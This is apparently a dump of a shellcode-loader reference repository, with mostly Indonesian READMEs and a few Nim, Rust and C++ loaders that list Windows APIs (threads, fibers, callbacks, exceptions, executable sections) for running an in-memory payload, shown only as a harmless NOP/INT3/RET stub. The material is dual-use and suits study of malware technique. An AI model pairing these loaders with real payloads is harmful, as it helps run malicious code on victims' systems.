| 3 | Executing shellcode using timer. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `timeSetEvent`. 8 | 9 | Fungsi ini tergolong obsolete. 10 | 11 | ```c++ 12 | MMRESULT timeSetEvent (UINT uDelay, UINT uResolution, LPTIMECALLBACK lpTimeProc, DWORD_PTR dwUser, UINT fuEvent); 13 | 14 | MMRESULT timeKillEvent (uTimerID); 15 | 16 | MMRESULT timeBeginPeriod (UINT uPeriod); 17 | 18 | MMRESULT timeGetDevCaps (LPTIMECAPS ptc, UINT cbtc); 19 | ``` 20 | 21 | ### Reference 22 | 23 | - [MSDN timeSetEvent](https://docs.microsoft.com/en-us/previous-versions//dd757634(v=vs.85)) 24 | - [MSDN timeKillEvent](https://docs.microsoft.com/en-us/previous-versions//dd757630(v=vs.85)) 25 | - [MSDN timeGetDevCaps](https://docs.microsoft.com/en-us/windows/win32/api/timeapi/nf-timeapi-timegetdevcaps) 26 | - [MSDN timeBeginPeriod](https://docs.microsoft.com/en-us/windows/win32/api/timeapi/nf-timeapi-timebeginperiod) -------------------------------------------------------------------------------- /windows/execution/exception/AddVectoredExceptionHandler/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing exception to run the shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode melalui exception yang telah didaftarkan melalui `AddVectoredExceptionhandler` dan dipicu dengan `RaiseException`. 8 | 9 | ```c++ 10 | PVOID AddVectoredExceptionHandler (ULONG First, PVECTORED_EXCEPTION_HANDLER Handler); 11 | 12 | void RaiseException (DWORD dwExceptionCode, DWORD dwExceptionFlags, DWORD nNumberOfArguments, const ULONG_PTR *lpArguments); 13 | 14 | ULONG RemoveVectoredExceptionHandler (PVOID Handle); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN AddVectoredExceptionhandler](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-addvectoredexceptionhandler) 20 | - [MSDN RaiseException](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-raiseexception) 21 | - [MSDN RemoveVectoredExceptionHandler](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-removevectoredexceptionhandler) -------------------------------------------------------------------------------- /windows/execution/exception/SetUnhandledExceptionFilter/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing exception to run the shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode melalui exception yang telah didaftarkan melalui `SetUnhandledExceptionFilter` dan dipicu dengan sembarang exception. 8 | 9 | ```c++ 10 | LPTOP_LEVEL_EXCEPTION_FILTER SetUnhandledExceptionFilter (LPTOP_LEVEL_EXCEPTION_FILTER lpTopLevelExceptionFilter); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN SetUnhandledExceptionFilter](https://docs.microsoft.com/en-us/windows/win32/api/errhandlingapi/nf-errhandlingapi-setunhandledexceptionfilter) -------------------------------------------------------------------------------- /windows/execution/exception/seh-catch-exception/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing exception to run the shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode melalui exception handler. 8 | 9 | ### Reference 10 | 11 | -------------------------------------------------------------------------------- /windows/execution/fiber/CreateFiber/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a fiber. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CreateFiber`. 8 | 9 | ```c++ 10 | LPVOID CreateFiber(SIZE_T dwStackSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter); 11 | 12 | LPVOID ConvertThreadToFiber(LPVOID lpParameter); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN CreateFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfiber) 18 | - [MSDN ConvertThreadToFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-convertthreadtofiber) -------------------------------------------------------------------------------- /windows/execution/fiber/CreateFiber/rust/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies.winapi] 8 | version = "0.3.9" 9 | features = [ 10 | "errhandlingapi", 11 | "memoryapi", 12 | "processthreadsapi", 13 | "synchapi", 14 | "winbase", 15 | "winnt", 16 | ] -------------------------------------------------------------------------------- /windows/execution/fiber/CreateFiberEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a fiber. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CreateFiberEx`. 8 | 9 | ```c++ 10 | LPVOID CreateFiberEx (SIZE_T dwStackCommitSize, SIZE_T dwStackReserveSize, LPFIBER_START_ROUTINE lpStartAddress, LPVOID lpParameter); 11 | 12 | LPVOID ConvertThreadToFiber(LPVOID lpParameter); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN CreateFiberEx](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfiberex) 18 | - [MSDN ConvertThreadToFiber](https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-convertthreadtofiber) -------------------------------------------------------------------------------- /windows/execution/fiber/FlsAlloc/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a fiber. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `FlsAlloc`. 8 | 9 | `FlsAlloc` digunakan untuk mengalokasikan `FLS (Fiber Local Storage`) index dan dapat digunakan untuk menyimpan dan mengambil kembali data secara local terhadap Fiber. 10 | 11 | ```c++ 12 | DWORD FlsAlloc (PFLS_CALLBACK_FUNCTION lpCallback); 13 | 14 | BOOL FlsSetValue (DWORD dwFlsIndex, PVOID lpFlsData); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN FlsAlloc](https://docs.microsoft.com/fr-fr/windows/win32/api/fibersapi/nf-fibersapi-flsalloc) 20 | - [MSDN FlsSetValue](https://docs.microsoft.com/en-us/windows/win32/api/fibersapi/nf-fibersapi-flssetvalue) -------------------------------------------------------------------------------- /windows/execution/fiber/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Eksekusi shellcode sebagai fiber. 6 | 7 | Fiber merupakan unit eksekusi bersifat cooperative-multitasking. Serupa dengan thread, fiber berbagi ruang memory dengan thread/fiber lain dalam satu process. 8 | 9 | Secara garis besar, shellcode yang telah diekstrak akan disalin ke ruang memory yang telah dialokasikan. Alamat shellcode kemudian menjadi fungsi entrypoint bagi fiber. -------------------------------------------------------------------------------- /windows/execution/fiber/RtlUserFiberStart/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a fiber. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `RtlUserFiberStart`. 8 | 9 | `RtlUserFiberStart` adalah fungsi internal dan bersifat low-level. 10 | 11 | ```c++ 12 | NTSTATUS RtluserFiberStart(); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN TEB (Thread Environment Block)](https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-teb) 18 | - [TEB](https://processhacker.sourceforge.io/doc/struct___t_e_b.html) 19 | - [TEB32](https://processhacker.sourceforge.io/doc/struct___t_e_b32.html) 20 | - [Wiki Thread Information Block](https://en.wikipedia.org/wiki/Win32_Thread_Information_Block) 21 | - [NT_TIB](https://kernelstruct.gitee.io/kernels/x64/Windows%2010%20|%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_NT_TIB) 22 | - [NT_TIB32](https://kernelstruct.gitee.io/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_NT_TIB32) 23 | - [MSDN NtCurrentTeb](https://docs.microsoft.com/en-us/windows/win32/api/winnt/nf-winnt-ntcurrentteb) -------------------------------------------------------------------------------- /windows/execution/invoke/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Eksekusi shellcode dengan cast shellcode sebagai function/procedur dan memanggil shellcode secara langsung. Shellcode akan dieksekusi pada thread yang sama dengan thread pemanggil. -------------------------------------------------------------------------------- /windows/execution/invoke/nim/code.nim: -------------------------------------------------------------------------------- 1 | #[ 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Executing shellcode by jump to it. 6 | 7 | Compile: 8 | $ nim c code.nim 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing copyMem 13 | - permission: VirtualProtect 14 | - execution: 15 | ]# 16 | import winim 17 | 18 | when isMainModule: 19 | var old_protect: DWORD = 0 20 | 21 | # shellcode storage in stack 22 | var payload: array[4, byte] = [byte 0x90, 0x90, 0xCC, 0xC3] 23 | 24 | # allocate memory buffer for payload as READ-WRITE (no executable) 25 | var runtime = VirtualAlloc(nil, payload.len, MEM_COMMIT, PAGE_READWRITE) 26 | 27 | # copy payload to the buffer 28 | copyMem(runtime, unsafeAddr payload, payload.len) 29 | 30 | # make buffer executable (R-X) 31 | var retval = VirtualProtect(runtime, payload.len, PAGE_EXECUTE_READ, addr old_protect) 32 | if retval != 0: 33 | let f = cast[proc(){.nimcall.}](runtime) 34 | f() 35 | 36 | VirtualFree(runtime, payload.len, MEM_RELEASE) 37 | -------------------------------------------------------------------------------- /windows/execution/invoke/rust/with-mmap/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | # See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html 8 | 9 | [dependencies] 10 | libc = "0.2.151" 11 | mmap = "0.1.1" 12 | -------------------------------------------------------------------------------- /windows/execution/invoke/rust/with-mmap/src/main.rs: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | Storing payload in stack. 6 | 7 | Compile: 8 | $ cargo build 9 | 10 | Technique: 11 | - allocation: Memorymap::new 12 | - permission: 13 | - execution: unsafe call to function pointer 14 | 15 | Note: 16 | - minimalistic code 17 | 18 | Dependencies: 19 | - mmap==0.1.0 -> allocate executable section 20 | */ 21 | 22 | extern crate mmap; 23 | 24 | use std::{mem, ptr}; 25 | use mmap::{MapOption, MemoryMap}; 26 | 27 | fn main() { 28 | let opts = [ 29 | MapOption::MapReadable, 30 | MapOption::MapWritable, 31 | MapOption::MapExecutable 32 | ]; 33 | 34 | // shellcode storage in stack 35 | let payload = [ 0x90, 0x90, 0xCC, 0xC3 ]; 36 | 37 | // allocate a memory buffer for payload 38 | let runtime = MemoryMap::new (payload.len(), &opts).unwrap(); 39 | 40 | unsafe { 41 | // copy payload to the buffer 42 | ptr::copy (payload.as_ptr(), runtime.data(), payload.len()); 43 | 44 | // execute the function 45 | mem::transmute::<_, fn()>(runtime.data())(); 46 | } 47 | } -------------------------------------------------------------------------------- /windows/execution/thread/CreateRemoteThread/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a thread. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CreateRemoteThread` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`. 8 | 9 | `CreateRemoteThread` umumnya digunakan untuk menjalankan thread di remote process. Namun thread baru dapat pula dieksekusi di process sendiri dengan memberikan handle `hProcess` bernilai `GetCurrentProcess()`. 10 | 11 | ```c++ 12 | HANDLE CreateRemoteThread (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); 13 | 14 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN CreateRemoteThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread) 20 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject) -------------------------------------------------------------------------------- /windows/execution/thread/CreateRemoteThread/rust/with-winapi/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies.winapi] 8 | version = "0.3.9" 9 | features = [ 10 | "errhandlingapi", 11 | "memoryapi", 12 | "processthreadsapi", 13 | "synchapi", 14 | "winbase", 15 | "winnt", 16 | ] -------------------------------------------------------------------------------- /windows/execution/thread/CreateRemoteThread/rust/with-windows-sys/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies] 8 | windows-sys = { version = "0.48.0", features = ["Win32_System_Memory", "Win32_Foundation", "Win32_System_Threading", "Win32_System_Diagnostics_Debug", "Win32_Security"]} -------------------------------------------------------------------------------- /windows/execution/thread/CreateRemoteThreadEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a thread. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CreateRemoteThreadEx` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`. 8 | 9 | `CreateRemoteThread` umumnya digunakan untuk menjalankan thread di remote process. Namun thread baru dapat pula dieksekusi di process sendiri dengan memberikan handle `hProcess` bernilai `GetCurrentProcess()`. 10 | 11 | Perbedaan antara `CreateRemoteThread` dan `CreateRemoteThreadEx` terletak pada adanya parameter `lpThreadId` yang memungkinkan untuk mendapatkan thread ID dari thread yang baru dipanggil. 12 | 13 | ```c++ 14 | HANDLE CreateRemoteThreadEx (HANDLE hProcess, LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, DWORD dwCreationFlags, LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList, LPDWORD lpThreadId 15 | 16 | ); 17 | 18 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 19 | ``` 20 | 21 | ### Reference 22 | 23 | - [MSDN CreateRemoteThreadEx](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethreadex) 24 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject) -------------------------------------------------------------------------------- /windows/execution/thread/CreateThread/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a thread. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CreateThread` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`. 8 | 9 | ```c++ 10 | HANDLE CreateThread (LPSECURITY_ATTRIBUTES lpThreadAttributes, SIZE_T dwStackSize, LPTHREAD_START_ROUTINE lpStartAddress, __drv_aliasesMem LPVOID lpParameter, DWORD dwCreationFlags, LPDWORD lpThreadId); 11 | 12 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 13 | ``` 14 | 15 | ### Reference 16 | 17 | - [MSDN CreateThread](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread) 18 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject) -------------------------------------------------------------------------------- /windows/execution/thread/CreateThread/rust/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies.winapi] 8 | version = "0.3.9" 9 | features = [ 10 | "errhandlingapi", 11 | "memoryapi", 12 | "processthreadsapi", 13 | "synchapi", 14 | "winbase", 15 | "winnt", 16 | ] -------------------------------------------------------------------------------- /windows/execution/thread/CreateThreadpoolWork/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `CreateThreadpoolWork`, `SubmitThreadpoolWork`, dan `WaitForThreadpoolWorkCallbacks`. 8 | 9 | ```c++ 10 | PTP_WORK CreateThreadpoolWork(PTP_WORK_CALLBACK pfnwk, PVOID pv, PTP_CALLBACK_ENVIRON pcbe); 11 | 12 | void SubmitThreadpoolWork(PTP_WORK pwk); 13 | 14 | void WaitForThreadpoolWorkCallbacks(PTP_WORK pwk, BOOL fCancelPendingCallbacks); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN CreateThreadpoolWork](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-createthreadpoolwork) 20 | - [MSDN SubmitThreadpoolWork](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-submitthreadpoolwork) 21 | - [MSDN WaitForThreadpoolWorkCallbacks](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-waitforthreadpoolworkcallbacks) -------------------------------------------------------------------------------- /windows/execution/thread/EtwpCreateEtwThread/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a thread. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `EtwpCreateEtwThread` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`. 8 | 9 | `EtwpCreateEtwThread` adalah fungsi internal dan bersifat low-level. 10 | 11 | ```c++ 12 | HANDLE EtwpCreateEtwThread (LPVOID routine, LPVOID param); 13 | 14 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [NTInternals EtwpCreateEtwThread](https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm) 20 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject) 21 | - [GIST TheWover](https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3) -------------------------------------------------------------------------------- /windows/execution/thread/NtCreateThreadEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a thread. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `NtCreateThreadEx` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`. 8 | 9 | `NtCreateThreadEx` adalah fungsi internal dan bersifat low-level. 10 | 11 | ```c++ 12 | NTSTATUS NtCreateThreadEx (PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, PVOID ObjectAttributes, HANDLE ProcessHandle, PVOID lpStartAddress, PVOID lpParameter, ULONG flags, SIZE_T szStackZeroBits, SIZE_T szStackCommitSize, SIZE_T szStackReserveSize, PVOID lpBytesBuffer); 13 | 14 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [NTInternals NtCreateThreadEx](https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethreadex) 20 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject) -------------------------------------------------------------------------------- /windows/execution/thread/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Eksekusi shellcode sebagai thread terpisah dengan shared memory address (berbagi ruang memory antar thread dalam satu process). Terdapat beberapa fungsi Threading di Windows (public/internal) yang dapat dimanfaatkan untuk menjalankan thread. 6 | 7 | Secara garis besar, shellcode yang telah diekstrak akan disalin ke ruang memory yang telah dialokasikan. Alamat shellcode kemudian menjadi fungsi entrypoint bagi thread. -------------------------------------------------------------------------------- /windows/execution/thread/RtlCreateUserThread/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a thread. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `RtlCreateUserThread` dan tunggu hingga eksekusi tuntas dengan `WaitForSingleObject`. 8 | 9 | `RtlCreateUserThread` adalah fungsi internal dan bersifat low-level. 10 | 11 | ```c++ 12 | NTSTATUS RtlCreateUserThread (HANDLE ProcessHandle, PSECURITY_DESCRIPTOR SecurityDescriptor, BOOLEAN CreateSuspended, ULONG StackZeroBits, PULONG StackReserved, PULONG StackCommit, PVOID StartAddress, PVOID StartParameter, PHANDLE ThreadHandle, PCLIENT_ID ClientID); 13 | 14 | DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [NTInternals RtlCreateUserThread](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FExecutable%20Images%2FRtlCreateUserThread.html) 20 | - [MSDN WaitForSingleObject](https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-waitforsingleobject) -------------------------------------------------------------------------------- /windows/execution/thread/SHCreateThread/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `SHCreateThread`. 8 | 9 | ```c++ 10 | BOOL SHCreateThread (LPTHREAD_START_ROUTINE pfnThreadProc, void * pData, SHCT_FLAGS flags, LPTHREAD_START_ROUTINE pfnCallback); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN SHCreateThread](https://docs.microsoft.com/en-us/windows/win32/api/shlwapi/nf-shlwapi-shcreatethread) -------------------------------------------------------------------------------- /windows/execution/thread/SHCreateThreadWithHandle/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `SHCreateThreadWithHandle`. 8 | 9 | ```c++ 10 | BOOL SHCreateThreadWithHandle (LPTHREAD_START_ROUTINE pfnThreadProc, void * pData, SHCT_FLAGS flags, LPTHREAD_START_ROUTINE pfnCallback, HANDLE * pHandle); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN SHCreateThreadWithHandle](https://docs.microsoft.com/en-us/windows/win32/api/shlwapi/nf-shlwapi-shcreatethreadwithhandle) -------------------------------------------------------------------------------- /windows/execution/thread/TpSimpleTryPost/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `TpSimpleTryPost`. 8 | 9 | `TpSimpleTryPost` adalah fungsi internal dan bersifat low-level. 10 | 11 | ```c++ 12 | NTSTATUS TpSimpleTryPost(PTP_SIMPLE_CALLBACK callback, PVOID args, PTP_CALLBACK_ENVIRON environ); 13 | ``` 14 | 15 | ### Reference 16 | -------------------------------------------------------------------------------- /windows/execution/thread/TrySubmitThreadpoolCallback/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Abusing callback to run shellcode. 4 | 5 | ### Overview 6 | 7 | Eksekusi shellcode dengan `TrySubmitThreadpoolCallback`. 8 | 9 | ```c++ 10 | BOOL TrySubmitThreadpoolCallback(PTP_SIMPLE_CALLBACK pfns, PVOID pv,PTP_CALLBACK_ENVIRON pcbe); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN TrySubmitThreadpoolCallback](https://learn.microsoft.com/en-us/windows/win32/api/threadpoolapiset/nf-threadpoolapiset-trysubmitthreadpoolcallback) -------------------------------------------------------------------------------- /windows/execution/thread/tls-callback/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Executing shellcode as a thread. 4 | 5 | ### Overview 6 | 7 | Thread Local Storage (TLS) callback dipanggil sebelum eksekusi entrypoint terjadi. Beberapa trik anti-debug dan anti-vm umum dilakukan sebagai TLS callback karena berada pada flow yang berbeda dengan entrypoint. 8 | 9 | Jumlah TLS callback dapat lebih dari satu dan terkadang di dalam satu callback dapat dibuat callback lain saat runtime. -------------------------------------------------------------------------------- /windows/permission/NtProtectVirtualMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Change the memory protection of virtual address space. 4 | 5 | ### Overview 6 | 7 | Ubah permission dengan `NtProtectVirtualMemory`. 8 | 9 | ```c++ 10 | NTSTATUS NtProtectVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PULONG NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [NTInternals NtProtectVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html) 16 | -------------------------------------------------------------------------------- /windows/permission/VirtualProtect/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Change the memory protection of virtual address space. 4 | 5 | ### Overview 6 | 7 | Ubah permission dengan `VirtualProtect`. 8 | 9 | ```c++ 10 | BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect) 16 | -------------------------------------------------------------------------------- /windows/permission/VirtualProtectEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Change the memory protection of virtual address space. 4 | 5 | ### Overview 6 | 7 | Ubah permission dengan `VirtualProtectEx`. 8 | 9 | ```c++ 10 | BOOL VirtualProtectEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN VirtualProtectEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotectex) 16 | -------------------------------------------------------------------------------- /windows/storage/global/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Store shellcode as global data (array). 4 | 5 | ### Overview 6 | 7 | Shellcode disimpan sebagai array of byte pada segment global dan dapat diakses melalui suatu alamat memory yang konstan. 8 | 9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah. -------------------------------------------------------------------------------- /windows/storage/resource/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Store shellcode as embedded resource in executable. 4 | 5 | ### Overview 6 | 7 | Shellcode disimpan sebagai array of byte dan disematkan sebagai resource. Akses shellcode dilakukan dengan serangkaian operasi pembacaan resource. 8 | 9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah. -------------------------------------------------------------------------------- /windows/storage/resource/c++/resources.h: -------------------------------------------------------------------------------- 1 | #define SHELLCODE 100 2 | -------------------------------------------------------------------------------- /windows/storage/resource/c++/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | SHELLCODE RCDATA shellcode.bin -------------------------------------------------------------------------------- /windows/storage/resource/c++/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/storage/resource/c++/resources.res -------------------------------------------------------------------------------- /windows/storage/resource/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/storage/resource/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/storage/section/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Store shellcode as separate section in executable. 4 | 5 | ### Overview 6 | 7 | Shellcode disimpan sebagai array of byte pada section khusus dengan permission tertentu. Eksekusi shellcode dapat dilakukan secara langsung tanpa melakukan alokasi terpisah. 8 | 9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah. -------------------------------------------------------------------------------- /windows/storage/section/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | storing payload as separate section 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: n/a 13 | - permission: VirtualProtect 14 | - execution: CreateThread 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | // create new executable section 22 | #pragma section(".code",execute,read) 23 | _declspec(allocate(".code")) 24 | uint8_t payload[] = { 0x90, 0x90, 0xCC, 0xC3 }; 25 | 26 | 27 | int main () 28 | { 29 | HANDLE th_shellcode; 30 | void * runtime = payload; 31 | 32 | // execute shellcode directly from section 33 | th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0); 34 | WaitForSingleObject (th_shellcode, -1); 35 | 36 | return 0; 37 | } -------------------------------------------------------------------------------- /windows/storage/section/rust/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies.winapi] 8 | version = 